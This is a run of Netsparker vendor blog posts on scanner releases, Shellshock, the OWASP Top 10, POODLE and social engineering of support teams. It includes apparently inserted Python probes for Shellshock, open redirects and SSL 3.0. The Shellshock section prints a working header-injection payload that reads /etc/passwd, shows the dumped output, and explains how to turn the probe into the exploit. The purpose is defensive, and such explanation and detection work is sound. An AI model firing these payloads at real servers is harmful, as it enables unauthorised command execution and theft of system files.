Channel: Invicti

More Efficient and Precise Web Security Scans with New Netsparker 3.5.5


A new update of Netsparker Web Application Security Scanner is available for download. This is a minor version update which includes a number of improvements and bug fixes that will improve the efficiency of web security scans.

More Efficient and Precise Scanning of Websites Using URL Rewrite

When using the wizard to configure URL rewrite rules, you can now specify the type of each parameter, as highlighted in the screenshot below.

Configuring URL Rewrite Rules in Netsparker using the wizard to scan websites using URL Rewrite Rules

Once a parameter type is specified, Netsparker automatically tunes the regular expression for that rule so that no extra HTTP requests are sent during a web vulnerability scan. The end result? More efficient and precise web security scans that consume less bandwidth.

Improved DOM Cross-site Scripting Scanner and DOM Parser

In the previous version of Netsparker we launched the all-new DOM parser and DOM XSS scanner, enabling Netsparker to detect DOM based cross-site scripting vulnerabilities, which are relatively common in modern HTML5 web applications.

We have already learnt a lot, and for this version we optimized both the DOM parser and the DOM XSS scanner so that they work more efficiently and detect more variants of DOM based vulnerabilities.

Since both the DOM parser and scanner are now more efficient, scanning for DOM based cross-site scripting vulnerabilities is now enabled by default in the built-in scan policies.

Netsparker Version 3.5.5 Change Log

Apart from the above major updates, Netsparker 3.5.5 includes several other improvements and a number of bug fixes. For more detailed information refer to the Netsparker 3.5.5 change log.

Upgrading Netsparker Web Application Security Scanner

If you are already using Netsparker Web Application Security Scanner, a window with the upgrade details will pop up the next time you run Netsparker. Alternatively you can always click Check for Updates in the Help drop down menu to check for updates manually.

If you have problems with the upgrade or product related queries, get in touch with our awesome support team by sending us an email on support@netsparker.com.


Latest Vulnerability Checks Added to Netsparker Community Edition


We are happy to announce a new updated version of Netsparker Community Edition, the community’s favourite free XSS and SQL Injection web application security scanner.

What is New in Netsparker Community Edition?

This update of Netsparker CE includes all of the scanning engine and product updates and bug fixes released between versions 3.1.7 and 3.5.5 of the commercial editions of Netsparker Web Application Security Scanner. This means that you can now use Netsparker CE version 3.5.8 to identify the latest variants of both SQL Injection and Cross-site Scripting vulnerabilities on your websites.

Identify SQL Injection and XSS Vulnerabilities Automatically

Netsparker Community Edition enables you or any member of your team to get an overview of the security state of your websites and web applications within a few minutes, before hackers do. In fact web application security expert Troy Hunt said in a product review that Netsparker is "just so damn easy to get started with". So what are you waiting for? Download Netsparker Community Edition, scan your websites and uncover vulnerabilities that might leave you and your business exposed, before malicious hackers uncover them for you and exploit them.

Download a Netsparker Demo

If you would like to run a full scan of your websites and check them for all types of web application vulnerabilities and security issues you can download a DEMO of Netsparker Web Application Security Scanner. Once you download the demo we will get in touch with you to help you through the evaluation process. Should you have any queries you can always get in touch with us.

Shellshock Bash Remote Code Execution Vulnerability Explained and How to Detect It


Shellshock is the latest vulnerability that will most probably become as notorious as Heartbleed, if not more so, and it is already being widely exploited, for example by a worm called wopbot. It gained so much attention because the vulnerability is in the Bash shell, which is found on almost every Unix / Linux based web server, server and network device.

What is the Shellshock Remote Code Execution Vulnerability?

Shellshock is a security bug that causes Bash to execute commands it finds in environment variables. Bash allows shell functions to be exported to child processes through environment variables whose value starts with "() {"; a vulnerable Bash does not stop parsing at the end of the function body but also executes whatever commands follow it. If exploited, the vulnerability allows an attacker to remotely run commands on the server, also known as remote code execution. Even though Bash is not an internet-facing service, many internet and network services such as web servers pass attacker-controlled data to the operating system through environment variables: a web server running CGI scripts, for example, copies the HTTP request headers into variables such as HTTP_USER_AGENT and HTTP_REFERER before running the script.

Since Bash did not properly stop at the end of the function definition when importing these variables, an attacker can place commands in an HTTP header and have them executed by the web server's operating system as soon as the CGI script, or anything it calls, runs Bash. The Shellshock vulnerability, discovered by Stephane Chazelas, was assigned the CVE identifier CVE-2014-6271. The initial fix was incomplete, and a bypass with the same consequences was discovered by Tavis Ormandy and assigned the CVE identifier CVE-2014-7169.

Exploiting Shellshock Vulnerability Using HTTP Requests

Many are concerned because the Shellshock vulnerability is very easy to exploit through web applications running on vulnerable servers, as shown in the following example against a CGI script. The attacker crafts an HTTP request that contains the below headers:

GET http://shellshock.testsparker.com/cgi-bin/netsparker.cgi HTTP/1.1
User-Agent: Netsparker
Host: shellshock.testsparker.com
Referer: () { :;}; echo "NS:" $(</etc/passwd)

Once the target server receives the HTTP request with the above headers, it responds by sending the content of the file /etc/passwd, as seen in the below HTTP response:

HTTP/1.0 200 OK
Server: nginx/1.2.1
Date: Fri, 26 Sep 2014 11:22:43 GMT
Content-Type: text/html
NS: root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
Debian-exim:x:101:103::/var/spool/exim4:/bin/false
messagebus:x:102:106::/var/run/dbus:/bin/false
avahi:x:103:107:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:105:111:MySQL Server,,,:/nonexistent:/bin/false
Connection: close

What does this mean? The attacker was able to execute an operating system command through a single HTTP request and read its output in the response. Any other command could be substituted for reading /etc/passwd, up to one that gives the attacker full control of the server.
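As an added example (this is not Netsparker's code), here is a probe in Python that sends the same kind of request and confirms execution the way a scanner must in order to avoid a false positive: the marker it looks for is computed by the target with Bash arithmetic, so a page that merely reflects the Referer or User-Agent header back into the response cannot produce it. The target URL passed to probe() is hypothetical and the sample responses used to check the logic are constructed; the header names and the "NS:" marker follow the request shown above.

```python
"""Shellshock (CVE-2014-6271) probe with a reflection-proof marker.

Added example, not Netsparker's code. The target host/path are hypothetical.
"""
import http.client
import secrets
from urllib.parse import urlsplit

# Bash function-definition prefix that triggers the bug; a vulnerable Bash
# also executes the command that follows the function body when it imports
# the environment variable a CGI gateway built from the HTTP header.
PREFIX = "() { :;}; "


def build_probe(a, b):
    """Return (header_value, expected_marker).

    The marker is computed on the target with Bash arithmetic: the request
    carries the literal "$((a*b))", never the product, so a response that
    only echoes the header back cannot contain the expected string.
    """
    payload = PREFIX + 'echo "NS: $((%d*%d))"' % (a, b)
    expected = "NS: %d" % (a * b)
    return payload, expected


def is_confirmed(raw_response, expected):
    """True only if the computed marker appears in the raw HTTP response.

    Headers and body are searched alike: in the page's example the echoed
    line lands among the response headers, because the CGI script emits it
    before the gateway has finished the header block.
    """
    return expected in raw_response


def probe(url, timeout=10.0):
    """Send the probe to a CGI URL and return whether execution was confirmed.

    The two operands are random so the expected marker differs per request.
    """
    parts = urlsplit(url)
    a, b = secrets.randbelow(9000) + 1000, secrets.randbelow(9000) + 1000
    payload, expected = build_probe(a, b)
    conn = http.client.HTTPConnection(parts.hostname, parts.port or 80,
                                      timeout=timeout)
    try:
        conn.request("GET", parts.path or "/", headers={
            "User-Agent": payload,   # CGI exports this as HTTP_USER_AGENT
            "Referer": payload,      # ... and this as HTTP_REFERER
        })
        resp = conn.getresponse()
        raw = "".join("%s: %s\r\n" % kv for kv in resp.getheaders())
        raw += "\r\n" + resp.read().decode("latin-1", "replace")
    finally:
        conn.close()
    return is_confirmed(raw, expected)


if __name__ == "__main__":
    # Hypothetical target, mirroring the CGI path used in the article.
    print(probe("http://shellshock.testsparker.com/cgi-bin/netsparker.cgi"))
```

Only run this against systems you are authorised to test. Replacing the echo with a command such as `$(</etc/passwd)` turns the probe into the exploit shown above; the arithmetic marker is enough to confirm the bug without touching any file.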

Scan Your Websites for the Shellshock Vulnerability Automatically

The latest version of Netsparker Web Application Security Scanner will automatically identify if your web application is vulnerable to Shellshock Bash vulnerability as seen in the below screenshot.

Shellshock

Upon identifying the vulnerability Netsparker will also confirm the vulnerability automatically, thus ensuring it is not a false positive. Netsparker also allows the users to manually exploit the vulnerability as seen in the above screenshot.

Updating Netsparker Web Application Security Scanner

If you are already using Netsparker, upon starting up the scanner it will automatically check for updates and alert you to download the latest update. Alternatively launch Netsparker and click Check for Updates from the Help drop down menu.

Free Shellshock Vulnerability Scan

If you are not a Netsparker customer, you can still find out if your web server is vulnerable to Shellshock vulnerability by scanning it with Netsparker Community Edition, our free SQL Injection and XSS vulnerability scanner.

For more detailed information about the Shellshock vulnerability refer to the Shellshock article on Wikipedia.

Free Shellshock Bash Vulnerability Scans with Netsparker Community Edition


Most probably by now you have already heard about the Shellshock vulnerability. Considering how many servers and internet facing devices are vulnerable to it, and how easy it is to exploit, we added the Shellshock vulnerability check to our free security scanner Netsparker Community Edition, giving everyone the opportunity to find out if their web environment is vulnerable to this critical vulnerability.

Scan for Shellshock Bash Vulnerability for Free

If you would like to find out if your web servers are vulnerable to Shellshock vulnerability download the free Netsparker Community Edition web security scanner and scan your websites.

Shellshock

An Automated Scanner That Finds All OWASP Top 10 Security Flaws, Really?


Many security software vendors claim that their web application security scanner can identify all vulnerabilities in the OWASP Top 10. How true is such a claim?

A question we are typically asked is whether Netsparker Web Application Security Scanner can detect all vulnerabilities and security flaws listed in the OWASP Top 10. Many are led to believe, and told, that some automated web application security scanners can detect all vulnerabilities and security issues listed in the OWASP Top 10.

I have personally seen responses from security software companies stating that their web vulnerability scanner, or network scanner can detect all vulnerabilities listed in the OWASP Top 10. To start off with let us be clear, such statements are not true. There is no automated tool that can detect all security flaws listed in the OWASP top 10.

Apart from the fact that such statements are not true, they are also misleading security professionals and decision makers. But simply answering the question is not enough. This article goes into the details and explains why no security software can automatically identify all vulnerabilities listed in the OWASP Top 10 list.

What is the OWASP Top 10 List?

For those who are new in the web application security field; OWASP is short for Open Web Application Security Project. OWASP is a non profit organization that raises web application security awareness. Every three years OWASP publishes the OWASP Top 10 list. The list highlights the most commonly exploited vulnerabilities and security problems found in websites and web applications.

The list as such is not the holy grail for web application security experts, but it serves as a guideline for organizations to ensure their web applications are not vulnerable to these most commonly exploited vulnerabilities and web application security issues. In fact there are many other vulnerabilities and security issues that can be found in web applications that are not listed in the OWASP Top 10, and ideally all of them should be addressed with time.

Understanding All the Security Flaws in the OWASP Top 10

A1 - Injection

The first in the list are injection vulnerabilities such as SQL Injection and OS Command Injection. These are technical vulnerabilities and can be detected by an automated web application security scanner, also known as a web vulnerability scanner.

A2 - Broken Authentication and Session Management

Second in the list are authentication and session management security issues. Unlike A1, A2 does not refer to a specific list of vulnerabilities, but addresses a number of security issues related to the design of the web application that might lead to authentication vulnerabilities.

This is the first category in the OWASP Top 10 list which lists a number of security issues that CANNOT be automatically identified by a web vulnerability scanner. For example insecure storage of user credentials; credentials are stored in clear text and are not protected using hashing or encrypted when stored in the backend database. An automated web vulnerability scanner, or any other automated security tool can never determine how user authentication details are stored in your web application’s backend database. Such checks can only be done manually by a human.

Having said that some of the security issues listed in this category can be identified automatically by web application security scanners. For example session IDs exposed in URLs, or the transmission of usernames and passwords over an unencrypted connection.

A3 - Cross-Site Scripting (XSS)

There are many different variants of cross-site scripting vulnerabilities, such as reflected, persistent and DOM XSS. Since all of them are technical vulnerabilities, they can all be detected by using an automated web application security scanner. Before choosing your web application security scanner, though, make sure you test it properly, because some scanners have a number of shortcomings, especially when it comes to detecting DOM XSS vulnerabilities.

A4 - Insecure Direct Object References

Category A4 refers to a number of logical security problems in web applications. The word logical is already an indication that this type of security issue cannot be detected by automated web vulnerability scanners, as explained in the section Identifying Logical Vulnerabilities of the web application security getting started guide.

This category refers to a number of security issues where typically a sensitive object or resource is not protected properly. For example a user account has access to information he or she should not have access to. To prevent such problem the application should verify if the authenticated user has access to such resource before allowing the user to access it. Such type of problem can never be identified by an automated tool because tools cannot determine if a specific user should have access to a specific resource or not. Only a person who is familiar with the operations and business scope of the web application can determine who should be able to access what.

A5 - Security Misconfiguration

This category refers to a number of security issues which are the result of a misconfiguration in the server or the software and framework being used. Most of these security issues can be automatically identified with an automated web vulnerability scanner, though most of them still need to be verified by a human who is familiar with the web application before being confirmed as security issues, as explained below.

Unnecessary network services: You can identify running network services such as FTP, DNS and SMTP on your web server by using a port scanner. The scanner will report the open ports but it is up to you to determine if the reported network services are needed or not.

Out of Date Software: A web vulnerability scanner will alert you if any of the software being used to run your web application is outdated and most probably vulnerable. A scanner can also identify the web server version, the development framework (php, .NET etc) version and even the version of well known web applications such as WordPress, Drupal etc.

Security Settings of Development framework: A web vulnerability scanner can also notify you of some configuration issues in development frameworks that might leave your web application exposed to malicious hack attacks. For example a scanner will alert you if debugging is enabled, or if error messages disclose sensitive information.

Default Accounts and Passwords: Web vulnerability scanners typically run dictionary-based brute force attacks against the login forms they discover, so weak or default credentials on those forms will be identified. This is, of course, limited to what you are scanning: if the web server itself is administered with weak credentials, a web vulnerability scanner will never find them. That is why it is important to audit every component that makes up your web farm.

A6 - Sensitive Data Exposure

The criticality of the security issues listed in this category vary depending on the organization’s scope; while some data is considered as sensitive by a particular business, it might not be sensitive for other businesses. Hence most of the security issues in this category cannot be identified automatically with security tools because it is impossible to cater for all cases, or alternatively you will be flooded with false positives.

Only a person who is familiar with the scope of the web application is in a position to be able to determine if some data should be available to the visitors or a specific user. Though having said that, there is data that is always considered as sensitive and automated scanners can identify it, such as cardholder data, social security numbers, users’ credentials and similar data.

A7 - Missing Function Level Access Control

Category A7 refers to access control. For example, do users have to be authenticated to access an admin portal, or can it be accessed anonymously? This category is not just about admin portals, though. Looking at web based finance solutions, for example, are accounts clerks or bookkeepers able to access records that are typically reserved for financial controllers only? Ideally they should not be.

Hence, as in the previous category, not all security issues in this category can be identified with an automated web application security scanner. If an admin portal is accessible anonymously, an automated tool will most probably advise you of the problem, because it can notice a specific pattern in the URL, such as /admin/ or /private/. But the tool won't alert you if a logged in user can see records that he should not be able to see, or is able to access specific sections of the website that he should not.

As per the above example, an automated tool cannot differentiate between what a bookkeeper and a financial controller should see, hence such security issues or vulnerabilities cannot be identified automatically. They can only be identified manually, and even then, unless the penetration tester is familiar with the scope of the web application being audited, it is very difficult to highlight such problems.

A8 - Cross-site Request Forgery

A Cross-site Request Forgery (CSRF) vulnerability is often described as the opposite of cross-site scripting: it exploits the trust that a site has in a user's browser rather than the trust a user has in a site. When exploited, malicious requests are sent to the web application from the user's browser without the user's consent, and the application accepts them because the browser attaches the user's session cookies automatically.

CSRF vulnerabilities can typically be identified automatically. To protect against CSRF attacks, developers add anti-CSRF tokens to forms and requests, and the application rejects any request that does not carry a valid token. This is what makes the tokens a problem for scanners: a scanner that replays or mutates requests without a fresh valid token has every request rejected, and so cannot detect the other vulnerabilities listed in the OWASP Top 10, such as XSS and SQL Injection, in the protected parts of the application. Therefore many automated web vulnerability scanners recommend that users disable anti-CSRF tokens while scanning the website, and, funnily enough, the same scanners then raise alerts that no anti-CSRF tokens were found.

Netsparker has built-in anti-CSRF token support, so it can scan websites and automatically detect vulnerabilities without the tokens being disabled, allowing you to scan sites as they really run.

A9 - Using Components with Known Vulnerabilities

This is most probably common sense for many security people out there but you would be surprised by how many people still run old and vulnerable software.

Web vulnerability scanners do run a number of checks to verify if the web server, database server and other server components that you are running are not vulnerable to any known vulnerabilities. Typically automated scanners also have a number of checks for well known web applications and components, such as WordPress, Joomla!, Drupal etc.

Though it is virtually impossible for a web vulnerability scanner to have a list of all possible vulnerable components and software, therefore it is up to you to ensure that you always use the latest version of a particular software.

A10 - Unvalidated Redirects and Forwards

The last category of the OWASP Top 10 refers to unvalidated redirects and forwards, also known as open redirects. These happen when the web application automatically redirects or forwards the visitor to a URL taken from a request parameter, and that parameter can be tampered with, so the visitor can be sent to a malicious website, typically one used for phishing.

For example, imagine you have to select a language upon visiting a website and are then automatically redirected to the site for that language. Let's say you have chosen English; the website then populates the address parameter in the example URL below with the URL of the English site.

http://www.example.com/redirect.php?address=en.example.com

In such cases, if the attacker can change the URL in the address parameter to another URL then the target website is vulnerable to unvalidated redirects and forwards. In most cases web vulnerability scanners can identify such security issues automatically.
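The following is an added example (not code from the article) of why these checks are easy to get wrong: a substring check of the kind many applications use, beside a validator that parses the parameter and allows only an exact allow-list of hosts. The parameter name and en.example.com come from the URL above; the other language hosts are assumed. It goes beyond the article's single case and covers the inputs an open-redirect check typically tries: protocol-relative URLs, user@host tricks, look-alike hosts and non-HTTP schemes.

```python
"""Open redirect: the weak check beside a hardened one.

Added example, not the article's code. ALLOWED_HOSTS is an assumption.
"""
import re
from urllib.parse import urlsplit

# Hosts the language selector may redirect to (assumed for the example).
ALLOWED_HOSTS = {"en.example.com", "de.example.com", "fr.example.com"}

# Anything that looks like "scheme:" at the start of the value.
SCHEME_RE = re.compile(r"^[a-zA-Z][a-zA-Z0-9+.\-]*:")


def weak_is_safe(address):
    """Substring check as many applications do it: trivially bypassable,
    e.g. by http://en.example.com.evil.example/ or ?address=//evil.example."""
    return "example.com" in address


def safe_redirect_target(address):
    """Return an absolute https URL on a permitted host, or None.

    Fails closed on every input it cannot positively classify, which is the
    property a redirect parameter needs.
    """
    value = address.strip()
    if value.startswith("//") or value.startswith("\\\\"):
        return None                         # protocol-relative: browser goes to //host
    if not SCHEME_RE.match(value):
        value = "https://" + value          # bare host, as in the article's example
    parts = urlsplit(value)
    if parts.scheme not in ("http", "https"):
        return None                         # javascript:, data:, mailto: ...
    if parts.username is not None:
        return None                         # "en.example.com@evil.example": real host is after the @
    host = (parts.hostname or "").lower()
    if host not in ALLOWED_HOSTS:
        return None                         # exact match only; no suffix or substring matching
    return "https://" + host + (parts.path or "/")


if __name__ == "__main__":
    for candidate in ("en.example.com", "//evil.example/",
                      "http://en.example.com.evil.example/", "javascript:alert(1)"):
        print("%-40s weak=%-5s safe=%s" % (candidate, weak_is_safe(candidate),
                                            safe_redirect_target(candidate)))
```

Note that a value such as en.example.com:8080/path, with a port but no scheme, is parsed as a scheme and rejected; that is the fail-closed side of the design, and a real application would rather not accept a port at all. A scanner's open-redirect check sends exactly these shapes of value and watches the Location header, which is why the allow-list approach keeps it quiet while the substring check does not.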

Identifying All Security Issues and Vulnerabilities from OWASP Top 10 in Your Websites

As this article explains there are some vulnerabilities and security flaws from the OWASP Top 10 list that can be identified with an automated web application security scanner while others that cannot. To ensure that all web application vulnerabilities are identified on your websites use a mix of both, i.e. use the automated tools and also do a manual penetration test. As we have seen from some of the vulnerabilities mentioned above it is also important that the person doing the manual audit is also familiar with the business scope of the web application, else not all security issues will be identified, especially the logical ones.

Oh, and by the way, the next time someone tells you that their scanner can automatically identify all vulnerabilities listed in the OWASP Top 10, tell them to stop fooling around and send them the link to this article. Alternatively ask them to send you a report that shows that their tool actually identified every vulnerability and security issue variant mentioned in the OWASP Top 10 list.

POODLE SSL Vulnerability - The End of Life for SSL 3.0


Yesterday a trio of Google researchers published the details of a new security vulnerability in SSL 3.0. The new vulnerability, called POODLE (short for Padding Oracle On Downgraded Legacy Encryption), allows an attacker to break the cryptographic protection of SSL 3.0, and thus to read data passing over a supposedly secure channel and use it to craft further attacks.

It is important to point out that SSL 3.0 is 15 years old and, even though there are several much improved successors, support for it remains widespread. The fact that the majority of web servers on the internet still support SSL 3.0 is what makes this vulnerability so widespread and critical.

How Does the POODLE Vulnerability Work?

When you access a website over SSL/TLS, the client (in most cases a browser) and the server have to agree on which version of the protocol to use for the session. The client announces the highest version it supports in its first message and the server picks the version to use. If the handshake fails, because the server does not support the offered version or because of a network glitch, many clients retry with the next lower version. This retry behaviour, called the downgrade dance, continues until a version both client and server support is established, and the lowest version most browsers will fall back to is SSL 3.0.

The downgrade dance can be triggered deliberately by an active attacker, not only by network glitches. Since attackers know that SSL 3.0 is vulnerable, an attacker in a man in the middle position simply breaks the TLS handshakes of the victim, who is accessing the web application running on the server, until the victim's browser falls back to SSL 3.0.

Once an SSL 3.0 connection is established, the attacker can exploit the POODLE vulnerability: the padding used by SSL 3.0's CBC cipher suites is not properly checked, so by making the victim's browser send many slightly different requests (for example from a malicious web page) and watching which ones the server accepts, the attacker can decrypt a secret such as the session cookie one byte at a time and use it to hijack the web session.

For more details about the POODLE vulnerability you can refer to the official POODLE SSL vulnerability documentation.

How Critical is the POODLE Vulnerability?

The POODLE vulnerability is critical, though not as critical as Heartbleed, the previous SSL vulnerability that sent the security industry into panic mode. While Heartbleed could be exploited by sending requests directly to the server, to exploit POODLE an attacker must control the connection between the victim and the server, launch a man in the middle attack and make the victim's browser issue a large number of requests, which is not a straightforward process that can be run at scale.

Therefore the chances of POODLE being widely exploited are low. This does not mean that you should take no action to ensure that your web servers are not vulnerable: disabling SSL 3.0 on the server removes the problem at its root.

Are Your Web Servers Vulnerable to the POODLE Bug?

The chances that your web servers are vulnerable to the POODLE vulnerability are very high because as explained before support for SSL 3.0 is still very popular. To find out if they are scan your web servers with the latest version of Netsparker Web Application Security Scanner, which includes the check for the POODLE bug.

The POODLE SSL vulnerability detected by Netsparker Web Application Security Scanner
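As an added example, and not Netsparker's own check, here is how such a test can be done directly in Python: send an SSL 3.0 ClientHello and see whether the server answers with an SSL 3.0 ServerHello (it still supports the protocol, and is therefore exposed to POODLE) or with an alert (it refuses). Python's ssl module cannot be used for this, because modern builds no longer speak SSL 3.0 at all, which is exactly why the records are built and parsed by hand. The host in the usage call is hypothetical and the responses used to check the parser are constructed.

```python
"""Does a server still accept SSL 3.0? A minimal ClientHello/ServerHello check.

Added example, not Netsparker's code. The host used below is hypothetical.
"""
import os
import socket
import struct

SSL3 = b"\x03\x00"                  # protocol version 3.0
HANDSHAKE, ALERT = 0x16, 0x15       # record content types
CLIENT_HELLO, SERVER_HELLO = 0x01, 0x02
# A few CBC and RC4 suites an SSL 3.0 server of the era would accept.
CIPHER_SUITES = [0x002F, 0x0035, 0x000A, 0x0005, 0x0004]


def build_client_hello():
    """Record layer + handshake layer of an SSL 3.0 ClientHello."""
    suites = b"".join(struct.pack("!H", s) for s in CIPHER_SUITES)
    body = (SSL3                                # client_version = 3.0
            + os.urandom(32)                    # gmt_unix_time + random bytes
            + b"\x00"                           # session_id length 0
            + struct.pack("!H", len(suites)) + suites
            + b"\x01\x00")                      # one compression method: null
    # Handshake header: type (1 byte) + length (3 bytes, big-endian)
    handshake = bytes([CLIENT_HELLO]) + struct.pack("!I", len(body))[1:] + body
    # Record header: type (1) + version (2) + length (2)
    return bytes([HANDSHAKE]) + SSL3 + struct.pack("!H", len(handshake)) + handshake


def accepts_sslv3(response):
    """True iff the first record is a Handshake/ServerHello negotiating 3.0."""
    if not response:
        return False                            # server closed without answering
    if response[0] == ALERT:
        return False                            # handshake_failure / protocol_version
    if len(response) < 11 or response[0] != HANDSHAKE or response[5] != SERVER_HELLO:
        return False                            # not a ServerHello, or truncated
    return response[9:11] == SSL3               # server_version inside the ServerHello


def probe_sslv3(host, port=443, timeout=5.0):
    """Open a TCP connection, send the ClientHello and read the first record."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_client_hello())
        data = b""
        while len(data) < 11:
            chunk = sock.recv(4096)
            if not chunk:                       # alert records are shorter; server closes
                break
            data += chunk
    return accepts_sslv3(data)


if __name__ == "__main__":
    # Hypothetical host; report whether it still negotiates SSL 3.0.
    print(probe_sslv3("www.example.com"))
```

A server that answers with an SSL 3.0 ServerHello is what the POODLE check flags; one that sends a fatal handshake_failure or protocol_version alert has SSL 3.0 disabled. Some servers simply drop the connection instead of sending an alert, which the code also treats as "not supported".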

Netsparker Version 3.5.12 Changelog

Apart from the security check for the POODLE vulnerability, the latest version of Netsparker also includes a number of bug fixes. Refer to the Netsparker changelog for more detailed information.

Updating Netsparker Web Application Security Scanner

If you are already using Netsparker Web Application Security Scanner, a window with the update details will pop up the next time you run Netsparker. Alternatively you can always click Check for Updates in the Help drop down menu to check for updates manually.
 
If you have problems with the updating process or have product related queries, get in touch with our awesome support team by sending us an email on support@netsparker.com.

Integrating Netsparker in Your Vulnerability Management Solution


Yesterday we announced a new strategic partnership with Lunarline. This partnership means that web security scan results generated by Netsparker Web Application Security Scanner can be imported into Lunarline’s vulnerability management solution Vulnerability Scan Converter.

What is Vulnerability Management Software?

Vulnerability management software allows security professionals to import scan results generated from different automated security scanners in a centralized location, allowing better management of the whole security program.

There are several reasons why security professionals use vulnerability management software. First off, many security professionals do not focus solely on web application security, but also on network, server and any other type of security. Therefore when using different automated tools to scan different components in an organization’s IT infrastructure they end up with a good number of separate reports. By importing all the scan results to a vulnerability management software security professionals centralize all their reports hence can have a better overview of the security state of a whole infrastructure and ease the job of remediating the security flaws.

There are also security professionals who use different scanners against the same target and by doing so the information they have in their reports overlap. To ensure they get the best out of their reports and ensure there is no repetitive work they import the scan results in a vulnerability management software which allows them to iron out all of the overlapping information.

Netsparker Integration with Vulnerability Management Solutions

At Netsparker we understand that some of our users are not just responsible for the security of their web applications. Hence we partnered with a number of vulnerability management software vendors so that our users have a good number of solutions to choose from. Currently all of the solutions listed below can import Netsparker's scan results:

    • Threadfix Vulnerability Manager
    • Risk I/O Vulnerability Dashboard
    • LunarLine Vulnerability Scan Converter
    • Dradis Framework

If you use a vulnerability management solution that is not listed above, contact your vendor so they can get in touch with us and we can partner with them.

Centralizing Web Security Scan Results

If you are responsible for the security of many websites and web applications and would like to centralize all the web application security scan results you can also use Netsparker Cloud, our new online web application security scanner that is specifically tailored to help organizations manage the security of their websites and web applications.

Social Hacking of Support and Implementation Teams


Support, customer service and implementation teams are the human gateways into many systems. Because they are human, with regular access to some of the most sensitive information for a business, they pose a special security risk from two kinds of behaviour: malicious behaviours, intended to exploit the system in some way, and innocent behaviours, which place the system at risk as a by-product, rather than a goal. In this article, we will focus on malicious behaviours and how to defend against them.

Social Engineering Customer Facing and Operations Teams

The dangers of malicious behaviour initiated purposely by an employee of customer facing and operations teams are obvious – but they are not unique to them. It is the high risk of being tricked into these behaviours by a second party – social engineering hacks – that makes these teams a special security weak point, as they have more direct contact with users than members of any other team and so present tempting targets. They also expect to be contacted by strangers, whereas other teams may become suspicious as soon as they are approached and be on guard for every unexpected interaction. So while general engineering techniques such as fake surveys can be used against all teams, user-targeting hacks - an attempt to hack a single user’s account - are most likely to utilize these customer facing teams.

Social engineering takes advantage of support and implementation employees to hack user accounts without investing in it technologically. Sometimes, hackers take advantage of errors in the rules that these teams are following; sometimes the rules are correct, but team members bend them out of a desire to help or through being manipulated and talked or pressured into a mistake.

Why the Rules Do Not Always Protect You

As an example of rules failing, Scott Hanselman's hacker got Amazon to send Mr Hanselman a new Kindle, and then changed the shipping address away from Mr Hanselman. The address change should not have been possible and was refused several times, but the hacker called again and again until he found a representative more eager to help than to follow the rules. Mr Hanselman also notes that the hacker was not asked to log onto Amazon to prove he had access to the account, nor did some of his suspicious requests, such as trying to eliminate a paper trail, raise a red flag.

Sometimes, the problem isn’t with one company’s rules or behaviours, so much as with the way that different companies reveal or request different information. Contradictory rules were at the base of the Mat Honan and Gizmodo hack from 2012, one of the best known examples of this sort of hacking. As Mr Honan puts it, “the very four digits that Amazon considers unimportant enough to display in the clear on the web are precisely the same ones that Apple considers secure enough to perform identity verification.” His hacker used two companies’ by-the-book actions to gain access to two accounts, based on the differences in what these companies considered private and hard-to-get information.

Both of these hackers used some information they had about their victim, and a lot of information about which rules can be exploited and which can be overcome with enough effort. That is the essence of social engineering.

How Implementation Teams can Be Socially Engineered

You might think that implementation, as it is on-site and often face-to-face with users, cannot be exploited by social engineering as it relies on impersonating a stranger. But since implementation workers are often away from the office and moving between different sites, it can be quite easy for a hacker to pretend to be not an anonymous user but a fellow-employee, or an employee of the client, who has simply not met the implementation worker before. Using supposed familiarity can help the hacker lower the implementation worker’s defences. Additionally, real employees that are well known to implementation teams may gain access to information they should not be able to see, and then pass it on for profit.

Defending Against Social Engineering Attacks

So we can see that avoiding social engineering hacks requires two things: correct rules, and a willingness to follow them even when the user sounds distressed or simply very innocent and convincing, and especially when the user is known to the customer facing teams.

What forms a “correct” rule, or set of rules? At its base, exploitation of employees uses the inherent difficulty of verifying a person’s right to access information. The two sides of the equation, then, are the identity of the person and the information supplied to that person. A correct set of rules would seek to reveal as little information as possible, in exchange for as much identifying information as feasible. Keep three assumptions in mind at all times: you cannot really predict what hackers may find beneficial in the information your employees disclose; no single piece of identifying information is proof of identity; and some of the things you consider to be separate pieces of identity are all discoverable from a single source.

But the rules, as we said, are not enough. Employees must also stick to the rules despite the pressures or apparent distress of the user. And most of all, employees should use their common sense and pay attention to suspicious behaviour. If they flag a user, they may be able to prevent that user taking advantage of a fellow employee. In Mr Hanselman’s case, it took the hacker several tries to change the shipping address on the order. Any one of those tries could have flagged the hacker as behaving suspiciously, and a string of these flags should have stopped the shipment. Similarly, in Mr Honan’s case, the hacker made two calls – one to supply a new credit card number, one to use that number to verify his identity and so gain access to the account. Paying attention to this string of calls could have prevented the hack.

Employees should also feel confident that if they stick to the rules, they will receive backing from their bosses even if the user is not a hacker and complains about the lack of assistance. And, if you are measuring your employees by how many calls they handle, you should be aware that the time pressure makes it more likely that they will make mistakes such as give the hacker hints about security questions, reveal too much information before verifying identity and agree to perform actions that break the rules.

Summary

This post provided only a glimpse of social engineering. There are multiple techniques for this form of hacking, and multiple goals, from hacking your company to hacking your users’ accounts. Defending against all of them is difficult, but educating yourself and your support, customer service and implementation teams about social engineering – especially the need to be critical and on guard – is a good place to start.


ISO 27001 Certified PCI DSS QSA Detects Vulnerabilities and Security Flaws with Netsparker



